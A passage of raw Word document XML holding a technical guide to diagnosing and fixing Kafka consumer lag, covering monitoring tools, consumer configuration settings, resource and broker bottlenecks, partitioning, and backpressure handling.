          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all brokers are up and healthy. If some brokers are down or under heavy load, consumers may struggle to fetch data from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D7805"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Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check for exceptions or failures in the consumer logs that might indicate issues in the processing flow or message handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6257D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9. Investigate Kafka Broker Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1C9D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Broker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use Kafka’s JMX metrics or third-party tools like Prometheus to monitor broker performance. Look for high disk usage, memory issues, or CPU bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9A530"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Broker Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If brokers are overloaded, increase their resources or consider scaling out the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132CF3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0. Implement Consumer Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65456F30"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 some scenarios, a consumer might lag due to processing backpressure, i.e., it’s overwhelmed by too many messages at once. You can handle this by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C77355"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Mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement strategies like rate-limiting, queueing, or delaying message processing to allow the consumer to catch up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A05721"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use and Resume</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka consumers support pausing and resuming message consumption. If the consumer is lagging due to temporary overload, you can pause consumption until the backlog is processed, then resume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B38E5" w14:textId="77777777" w:rsidR="008A7200"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354F5">
          <v:rect id="_x0000_i3475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="420293F7"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Handle Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F33E6C"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consumer lag</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Kafka tools (kafka-consumer-groups.sh, monitoring tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEB151"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onsumer throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding more consumers to the consumer group or optimizing processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD54279"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consumer resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle higher processing loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963F1D4"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Kafka consumer configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as fetch.min.bytes, fetch.max.bytes, max.poll.records, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A410BA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partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensure the topic has enough partitions for the number of consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6839D8"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for network or disk I/O bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that may be limiting consumption speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157FCDD7"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pgrade Kafka versions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to take advantage of the latest performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630877B0"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and fix broker issues</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure they are not slowing down message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E478D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backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using pause/resume mechanisms or rate-limiting strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC00FC"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following these steps, you can mitigate or eliminate consumer lag in Kafka and improve the performance of your message processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D971D02" w14:textId="0CE6670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476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940CDD6" w14:textId="54ED7480"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66" w:name="_Toc197868080"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="866"/>
    </w:p>
    <w:p w14:paraId="193B9F32" w14:textId="3F48228E" w:rsidR="008D4445" w:rsidRPr="004269A3" w:rsidRDefault="008D4445"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ntify the Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2FFF0"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heck Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2B168"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to check the lag of your consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C9728"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check the consumer lag using the kafka-consumer-groups.sh command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFB21A"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49203762"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show the lag (difference between the consumer's offset and the latest offset in the partition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F97D52"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can help visualize consumer lag in real-time. This will give you insight into how much behind your consumers are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549A102"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onitor Kafka Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2AB0F"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JMX or Kafka monitoring tools (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus + Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to monitor the overall health of the Kafka cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559366A"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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check metrics like request rates, disk usage, CPU usage, and memory usage. Look for bottlenecks or resource exhaustion that could be slowing down the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8963CB"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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Track metrics related to consumers, such as message consumption rate, fetch time, and network usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C609B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ntify Potential Causes of Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F4FF9"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ce you’ve confirmed that lag is happening, the next step is to identify why it’s happening. The common reasons for consumer lag are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C00E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erformance Bottlenecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AE101"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eavy Processing Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer might not be able to process messages quickly enough because of heavy computations, complex data transformations, or time-consuming external calls (e.g., database writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B6A35B"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low IO Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer writes messages to disk or interacts with external systems (e.g., databases), I/O performance can become a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5922F"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ngle Consumer Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If only one consumer in the consumer group is processing large volumes of data, it could lead to lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5CA6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Consumer Configuration Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9377AA"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orrect Consumer Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer configuration might not be optimized. For example, low values for max.poll.records, fetch.min.bytes, or fetch.max.bytes could lead to inefficient message fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6273ED"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Processing Time</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The max.poll.interval.ms might be too low for your consumer to process messages, leading to frequent rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506034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Insufficient Resources (CPU, Memory, Disk, Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B936EE"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source Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer instance may not have enough CPU or memory to process messages quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D0468"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If there is insufficient network throughput between the consumer and the Kafka broker, it could slow down message fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EC93E"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Broker Performance Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B49F5"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Overload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers might be under heavy load, unable to serve data efficiently to consumers, leading to increased fetch times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F10E59"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Bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If brokers have slow disk I/O, consumers might experience delays in retrieving messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C05E13"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Partitioning Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5CE67"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w Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there are not enough partitions for the number of consumers, some consumers might be overloaded with work, causing lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C148C"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balanced Partition Assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uneven partition distribution among consumers can cause one consumer to process significantly more messages than others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1CEB2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Troubleshoot and Fix the Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75AB5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Once the possible causes are identified, take the appropriate actions to fix the problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A9B0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Consumer Processing Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AD38E"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Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Review the consumer’s logic to ensure it is efficient. Optimize complex computations and reduce time spent on each message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72D145"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f the consumer processes each message individually, switch to batch processing to reduce overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D30E66"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allel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consider using parallelism within the consumer to process multiple messages concurrently, if possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC19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Consumer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3B0A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max.poll.records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This allows the consumer to fetch more messages in a single poll, reducing the number of fetch calls and improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D372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just fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These settings control the amount of data fetched in each request. Increase them to fetch more data at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9EBCB"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max.poll.interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that this value is large enough to accommodate the consumer’s processing time, preventing unnecessary rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7CB0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Scale the Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C47DD3"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d More Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the number of partitions is less than the number of consumers, increase the number of partitions to improve parallelism and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A3A6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Scale Consumer Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E00557"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PU and Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allocate more resources to the consumer (e.g., scale vertically or horizontally in cloud environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39DF15"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Network Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that network bandwidth between the consumer and the Kafka broker is sufficient to handle the message volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FE18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Monitor and Optimize Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAC02B"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Kafka Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the brokers are overloaded, add more brokers to distribute the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB1534"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Disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If disk I/O is a bottleneck on brokers, consider using faster disks (e.g., SSDs) or improving disk configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C92E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f. Ensure Proper Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512704F"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balance Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Number of Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a few consumers are overloaded with many partitions, increase the number of partitions in your topic to spread the load more evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532820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Consider Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2331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lag issue is critical and persists despite basic fixes, consider the following advanced strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185E9ADA"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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If data duplication or inconsistent results are contributing to lag, consider configuring Kafka for exactly-once semantics to ensure reliable message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB3B5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 and Validate the Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10D31A"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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use tools like Kafka Manager, Burrow, or Prometheus to monitor lag and consumer performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCD7DF"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est in Production</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If possible, test in a production-like environment to validate the changes before deploying to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F25C7B" w14:textId="77777777" w:rsidR="008D444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B8F929">
          <v:rect id="_x0000_i3477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD2A5B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Troubleshoot Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B23F6"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ntify the problem</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check consumer lag using Kafka consumer group tools or monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F51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vestigate possible causes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Analyze consumer performance, configuration issues, resource constraints, broker performance, and partitioning issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF6A11"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consumer performance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355070A"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Improve processing logic and use batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBBD96"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just Kafka consumer configurations like max.poll.records, fetch.min.bytes, and max.poll.interval.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4EAC0"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the consumer group and increase partitions if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE97A0"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resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure adequate CPU, memory, and network resources for the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BA0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Kafka brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
